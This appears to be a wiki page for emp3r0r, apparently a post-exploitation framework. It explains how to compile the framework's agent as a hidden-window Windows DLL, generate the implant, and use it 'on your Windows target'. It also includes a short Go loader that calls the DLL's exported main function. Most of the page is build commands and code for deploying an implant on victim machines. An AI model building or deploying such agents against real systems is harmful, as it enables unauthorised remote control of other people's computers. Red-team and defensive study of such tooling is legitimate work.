DLL Agent
Jing Mi edited this page Jan 30, 2024 · 10 revisions
Modify ./cmd/agent/main.go to make it include this:

    // everything else
    import "C"

    //export main
    func main() {
        // everything else
    }

This exports the function main from the DLL so that it is callable.
Build the agent DLL on a Windows host with the following command:

    go build -buildmode=c-shared -ldflags='-s -w -H=windowsgui' -o emp3r0r.dll .\cmd\agent\

Copy emp3r0r.dll to ~/.emp3r0r/stub-win-dll-amd64, then open emp3r0r.

Run gen_agent and select option 3.

Copy the generated DLL and use it on your Windows target.

Here's a small tool that invokes a certain function from a certain DLL:

    package main

    import (
        "flag"
        "fmt"
        "syscall"
    )

    // Windows only: LoadLibrary/GetProcAddress/SyscallN exist only in the Windows syscall package.
    func main() {
        dll_file := flag.String("dll", "", "Load this DLL file")
        func_name := flag.String("func", "", "Call this function")
        flag.Parse()

        dllPath := *dll_file
        procName := *func_name

        // Load the DLL
        dll, err := syscall.LoadLibrary(dllPath)
        if err != nil {
            fmt.Println("Error loading DLL:", err)
            return
        }
        defer syscall.FreeLibrary(dll)

        // Get the function address
        proc, err := syscall.GetProcAddress(dll, procName)
        if err != nil {
            fmt.Println("Error getting function address:", err)
            return
        }

        // Call the function; its return values are not used
        syscall.SyscallN(proc, 0, 0, 0, 0)
    }

Build and run it:

    $env:VERBOSE='true' # enable logging so you know the agent is running
    .\rundll.exe -func main -dll emp3r0r.dll